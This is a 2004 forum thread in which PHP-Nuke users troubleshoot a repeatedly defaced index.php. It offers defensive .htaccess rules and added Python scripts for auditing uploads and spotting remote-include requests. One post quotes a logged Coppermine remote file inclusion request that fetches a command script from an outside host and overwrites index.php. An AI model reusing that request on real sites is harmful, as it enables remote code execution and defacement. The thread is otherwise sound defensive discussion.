Nuke Cops :: View topic - [Site hacked] index.php was being replaced/edited

Author: ring_c PostPosted: Tue Jun 01, 2004 5:14 pm    Post subject: [Site hacked] index.php was being replaced/edited

For the last 24 hours, my site was hacked twice with the same method.
Somehow, someone managed to alter/replace my index.php.

Today they left an index.php with these: "Rebellious Fingers - rebellious@end-war.com"

I'm using phpnuke v6.7.
Is this a known issue?
Is there a solution?

I also have Fortress running, and it didn't seem to bother them, nor did I get an email from it.

Any help will do. Please!

Author: madman PostPosted: Tue Jun 01, 2004 5:30 pm    Post subject: Re: [Site hacked] index.php was being replaced/edited

If you are using modules/addons which have a file upload feature, that could be the cause. Some XSS methods can also do the trick, which let your server create a file and then rename it with a php extension.

The solution: update any modules/addons/scripts that allow your visitors to upload a file to your site. If your server is running under Linux (or some *nix system that supports the ext2/ext3 file system), and you have access to the server shell, you can use the chattr shell command to change PHP-Nuke file attributes.

Author: ring_c PostPosted: Tue Jun 01, 2004 5:42 pm    Post subject: Re: [Site hacked] index.php was being replaced/edited

madman wrote:
If you are using modules/addons which have a file upload feature, that could be the cause. Some XSS methods can also do the trick, which let your server create a file and then rename it with a php extension.

I have the attach_mod in my phpbb. Could that be the problem?
Otherwise, I have the "upload files" in my admin panel too. I'll remove this one, as I'm not using it anyway...

madman wrote:
If your server is running under Linux (or some *nix system that supports the ext2/ext3 file system), and you have access to the server shell, you can use the chattr shell command to change PHP-Nuke file attributes.

Now, this is a Chinese for me... Sad

Author: madman PostPosted: Tue Jun 01, 2004 6:00 pm    Post subject: Re: [Site hacked] index.php was being replaced/edited

ring_c wrote:
I have the attach_mod in my phpbb. could that be the problem?


Try updating to attach mod 2.3.9 and enable the scripting code about security in download.php (part of the attach mod files). In addition, you can put a .htaccess file (if your server is running Apache, with full override for mod_access and mod_rewrite) into the attach mod upload directory (default is "/files/"). Here is the content of the .htaccess file:

Code:
<Files .htaccess>
  Order Allow,Deny
  Deny from all
</Files>

<FilesMatch "\.(p?html?|inc|php.?|pl|js|cgi|asp|conf)$">
  Order Allow,Deny
  Deny from all
</FilesMatch>

RewriteEngine on
RewriteCond %{HTTP_REFERER} !^http://(www\.)?YOURDOMAIN.FOO.BAR/.*$ [NC]
RewriteRule .*$ - [F]


Replace YOURDOMAIN.FOO.BAR above with your actual domain (you don't have to supply www prefix).

ring_c wrote:
Otherwise, I have the "upload files" in my admin panel too. I'll remove this one, as I'm not using it anyway...


Good idea.

ring_c wrote:
Now, this is a Chinese for me... Sad


Question Rolling Eyes

Author: ring_c PostPosted: Tue Jun 01, 2004 6:11 pm    Post subject: Re: [Site hacked] index.php was being replaced/edited

madman wrote:
Try updating to attach mod 2.3.9 and enable scripting code about security in download.php (part of attach mod file).


I am using 2.3.9.
I couldn't quite understand the second part of your sentence. Where do I enable scripting code? Also couldn't find any download.php under attach_mod.

madman wrote:
In addition, you can put .htaccess file

Thanks. Done that.

Author: madman PostPosted: Tue Jun 01, 2004 6:29 pm    Post subject: Re: [Site hacked] index.php was being replaced/edited

ring_c wrote:
I couldn't quite understand the second part of your sentence. where do I enable scripting code? also couldn't find any download.php under attach_mod.


If you are running stand-alone phpbb, download.php is in your phpbb root directory. If you are running the bb2nuke ported mod (PHP-Nuke standard forum module), it is located in the modules/Forums/ directory. By default, the security script code is commented out in this file. Read further in the comments in this download.php file.

ring_c wrote:
Thanks. done that.


Cool

Author: zanis PostPosted: Wed Jun 02, 2004 12:42 am    Post subject: Re: [Site hacked] index.php was being replaced/edited

madman wrote:
In addition, you can put .htaccess file (if your server running Apache, with full override to mod_access and mod_rewrite) into attach mod upload directory (default is "/files/"). Here the content of .htaccess file:

Code:
<Files .htaccess>
  Order Allow,Deny
  Deny from all
</Files>

<FilesMatch "\.(p?html?|inc|php.?|pl|js|cgi|asp|conf)$">
  Order Allow,Deny
  Deny from all
</FilesMatch>

RewriteEngine on
RewriteCond %{HTTP_REFERER} !^http://(www\.)?YOURDOMAIN.FOO.BAR/.*$ [NC]
RewriteRule .*$ - [F]


Replace YOURDOMAIN.FOO.BAR above with your actual domain (you don't have to supply www prefix).



Hello madman!

I was wondering if you could help me by explaining how this works and is it required if you allow your members to upload their own avatars for the forum?

Cheers

Zanis

Author: madman PostPosted: Wed Jun 02, 2004 8:02 am    Post subject: Re: [Site hacked] index.php was being replaced/edited

zanis wrote:
I was wondering if you could help me by explaining how this works


That .htaccess file is the last chance to prevent someone from uploading files and executing them. Let's take a look at all those modifiers one by one:

Code:
<Files .htaccess>
  Order Allow,Deny
  Deny from all
</Files>


This is to protect the .htaccess file itself. Usually .htaccess must be stored with 644 CHMOD attributes, but sometimes we forget to do so; this identifier will then ensure the .htaccess file cannot be altered in any way from outside (however, it is still alterable from ftp or other server-side file management).

Code:
<FilesMatch "\.(p?html?|inc|php.?|pl|js|cgi|asp|conf)$">
  Order Allow,Deny
  Deny from all
</FilesMatch>


This identifier will prevent some uploadable files from being executed from outside. In the declaration above, I restrict .htm, .html, .phtml, .phtm, .inc, .php, .php3, .php4, .pl, .js, .cgi, .asp, and .conf from being executed (if they exist). If someone can pass such files through the file upload checking in the script, they still won't be able to execute them due to the server/Apache restriction.

Code:
RewriteEngine on
RewriteCond %{HTTP_REFERER} !^http://(www\.)?YOURDOMAIN.FOO.BAR/.*$ [NC]
RewriteRule .*$ - [F]


This is to prevent hotlinking. This ensures all files stored in the upload directory must be processed from inside your domain. Please note the originating request is taken from the referer header. This means people using a firewall/proxy which strips the referral header will get the same restriction.

Quote:
is it required if you allow your members to upload their own avatars for the forum?


You can put that .htaccess in the avatar upload directory as well. Be sure there are no subdirs containing your scripting files below the upload directory. But for security reasons (as that is what this forum is for), in my opinion do not let users upload their avatars to your site. Provide only local/pre-existing avatars or let them use remote avatars (but still keep checking their extension and that they are valid images; however, this is already done in phpbb).

Sorry if this sounds too complicated. I can't explain it in simple words, maybe because we are talking about a technical topic. Perhaps someone can explain this better than me. Smile But honestly, playing with .htaccess isn't ever simple. This is the Swiss Army knife of Apache, similar to Regedit in Windows. If you do this the wrong way, you'll screw the entire system.
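An added example, not part of madman's post: a small audit that applies the FilesMatch extension pattern from the post to an upload directory listing. Apache evaluates that pattern case-sensitively against the file name, so the example also flags names for manual review using a stricter pattern; that stricter pattern, the function names and the sample listing are assumptions of this example.

```python
import os
import re

# Extension pattern copied from the FilesMatch block in the post. Apache
# applies it case-sensitively to the file's base name.
RULE = re.compile(r"\.(p?html?|inc|php.?|pl|js|cgi|asp|conf)$")

# Stricter audit pattern (an assumption of this example, not part of the
# post): ignore case and test every dot-separated part of the name.
AUDIT = re.compile(r"\.(p?html?|inc|php.?|pl|js|cgi|asp|conf)(?=\.|$)",
                   re.IGNORECASE)


def classify(path):
    """Return 'denied', 'review' or 'served' for one uploaded file."""
    name = os.path.basename(path)
    if name == ".htaccess" or RULE.search(name):
        return "denied"      # matched by the <Files> or <FilesMatch> block
    if AUDIT.search(name):
        return "review"      # script-like name the rule does not match
    return "served"          # not touched by either block


def audit(paths):
    """Group paths by classification, preserving input order."""
    report = {"denied": [], "review": [], "served": []}
    for path in paths:
        report[classify(path)].append(path)
    return report


def audit_dir(upload_dir):
    """Run the audit over every file below upload_dir."""
    found = []
    for root, _dirs, files in os.walk(upload_dir):
        found.extend(os.path.join(root, f) for f in files)
    return audit(sorted(found))


# Constructed listing of an upload directory (not taken from the thread).
SAMPLE = ["files/photo.jpg", "files/notes.txt", "files/page.html",
          "files/tool.php3", "files/lib.inc", "files/.htaccess",
          "files/Upload.PHP", "files/report.php.bak", "files/archive.tar.gz"]

if __name__ == "__main__":
    for verdict, names in audit(SAMPLE).items():
        print(verdict, names)
```

Anything reported under "review" in a real upload directory is worth inspecting by hand and removing if it is not a legitimate attachment.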

Author: Stephen2417Location: Bristolville, OH (US) PostPosted: Wed Jun 02, 2004 9:01 am    Post subject:

Alright, I said I was leaving once but I just can't sit here and watch you guys guess..

Plain and simple, it's coppermine.

Author: burnwaveLocation: Maryland, USA PostPosted: Wed Jun 02, 2004 9:33 am    Post subject: Re: [Site hacked] index.php was being replaced/edited

Where is his coppermine module on his site? All I am seeing is 4nAlbum. Does that module have public upload features? If so, that could be the case.

Author: SaraHol PostPosted: Thu Jun 03, 2004 8:15 am    Post subject:

That's a great post Madman. I certainly learned some stuff from it. Thanks.

Author: thewizardLocation: Germany PostPosted: Thu Jun 03, 2004 12:10 pm    Post subject: Re: [Site hacked] index.php was being replaced/edited

Well, haven't been here for a long time too. Wink.

So look, that's the way it's done. The vulnerable part is coppermine.
Got the guy and one of his DSL IPs from Brazil.

200.96.250.204 - - [01/Jun/2004:20:30:53 +0200] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://magnific.webcindario.com/cmd.txt?&cmd=cd%20/here the string for your home directory/;mv%20you.txt%20index.php HTTP/1.1"

Well, maybe someone can have a closer look at this cmd.txt mentioned in the string. If it's been deleted meanwhile, I took a copy Rolling Eyes so just PM me if someone wants it.


Last edited by thewizard on Thu Jun 03, 2004 12:24 pm; edited 1 time in total
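An added example, not part of the original thread: detection logic for the kind of request shown in the log line above, where a query parameter carries a remote URL. The log lines, hosts and function names below are constructed for illustration; it reports every parameter whose decoded value starts with http://, https:// or ftp://, so legitimate redirect parameters will also show up and need triage.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in Apache access-log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jun/2004:20:30:53 +0200] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://attacker.example/cmd.txt?&cmd=id HTTP/1.1" 200 512
198.51.100.4 - - [01/Jun/2004:20:31:10 +0200] "GET /modules.php?name=Forums&file=viewtopic&t=12 HTTP/1.1" 200 20311
203.0.113.7 - - [01/Jun/2004:20:32:02 +0200] "GET /index.php?page=ftp%3A%2F%2Fattacker.example%2Fx.txt HTTP/1.1" 404 210
"""

# client, identd, user, [timestamp], "METHOD target PROTOCOL", status
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

# A parameter value that is itself a remote URL.
REMOTE_RE = re.compile(r"^\s*(?:https?|ftp)://", re.IGNORECASE)


def find_remote_includes(log_text):
    """Return one finding per query parameter whose decoded value is a URL."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not an access-log line in the expected format
        parts = urlsplit(m["target"])
        # parse_qsl percent-decodes names and values for us.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if REMOTE_RE.match(value):
                findings.append({
                    "ip": m["ip"], "time": m["ts"], "path": parts.path,
                    "param": name, "value": value,
                    "status": int(m["status"]),
                })
    return findings


if __name__ == "__main__":
    for f in find_remote_includes(SAMPLE_LOG):
        print(f["time"], f["ip"], f["status"], f["path"], f["param"], f["value"])
```

A finding with a 200 status against a script that uses the parameter in an include is the case to investigate first.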

Author: Stephen2417Location: Bristolville, OH (US) PostPosted: Thu Jun 03, 2004 12:22 pm    Post subject:

Great thanks for posting how to hack a site with coppermine... suggest you remove that.

Author: thewizardLocation: Germany PostPosted: Thu Jun 03, 2004 12:27 pm    Post subject: Re: [Site hacked] index.php was being replaced/edited

No matter.
Exclamation Exclamation think it's better the guys out there disable their coppermine until it's secured. Seems it's only ONE way to hack the module

Author: Stephen2417Location: Bristolville, OH (US) PostPosted: Thu Jun 03, 2004 12:33 pm    Post subject:

Well, if you're directly accessing the file I don't think that would matter, you know..

All you have to do is get the latest version and you're done.




All times are GMT - 8 Hours
